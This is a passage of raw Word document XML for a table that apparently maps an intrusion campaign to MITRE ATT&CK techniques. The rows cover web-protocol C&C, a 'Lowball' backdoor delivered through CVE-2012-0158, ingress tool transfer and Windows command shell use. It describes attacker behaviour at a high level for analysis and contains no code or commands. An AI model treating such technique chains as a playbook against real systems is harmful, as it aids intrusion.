          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1256A463" w14:textId="102DA892"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236B66E4" w14:textId="7575CB98" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A571031" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="6D82A8BF" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D6BBC0" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CED9F73" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="530ACB6E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="602B0DD4" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6015C79D" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43CE75A5" w14:textId="42A8A4FB"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6EBE7A2B" w14:textId="767420A8" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C61C300" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="71833AA3" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="489087BF" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BB474A3"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04EB91A5" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C3F274E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C14E802" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496AD01E" w14:textId="5ACE1703"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7DD3B64C" w14:textId="40099E91" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E056F14" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Includes malicious file (backdoor Lowball)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="66B02BC7" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="526D8064" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DE35BDC"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2647F777"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663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31ED6354" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B902452" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="132C6326" w14:textId="2F55A229"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7B0851D9" w14:textId="3277DE19" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0938E4DA" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>The user tricked into execution (CVE-2012-0158 allow remote attackers to execute arbitrary code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="002D1D50" w14:paraId="0E6544AB" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8C4E0F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="149B43FC" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="238BC64F" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>071</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">.001 Application Layer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44437B2C" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDDF961" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E156D73" w14:textId="033AD118" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BD922D8" w14:textId="0AD79E3B" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="041AACD6" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Detail related to above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="002D1D50" w14:paraId="5EC881DE" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E080D11" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75EA20CF" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31F9AB06" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5222C88A" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4412CC9E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22A876B3" w14:textId="0274432A" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B743B4A" w14:textId="6B735F10" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5513419A" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial installation connects to C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="002D1D50" w14:paraId="346E350C" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D2B0215" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05FBB0B5" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23B6B166" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32C05EE3" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01E64E1E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="424BA6AC" w14:textId="414153A3" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1904F339" w14:textId="4CE82BD4" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6DF3937E" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="002D1D50" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Install upgraded tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A307AF" w:rsidRPr="00B857D7" w14:paraId="27D090C6" w14:textId="77777777" w:rsidTr="00A307AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02F5D2F9" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BAB441E"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64610C70"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T1059.003 Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A2717D9" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="708" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22DBD2BC" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2CF9CF51" w14:textId="02327998" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48CAE701" w14:textId="4B309BF5" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2693" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0CDEEA" w14:textId="77777777" w:rsidR="00A307AF" w:rsidRPr="00B857D7" w:rsidRDefault="00A307AF" w:rsidP="00A307AF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Still part of Initial Access step. Commands executed to achieve initial Discovery (etc aims)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
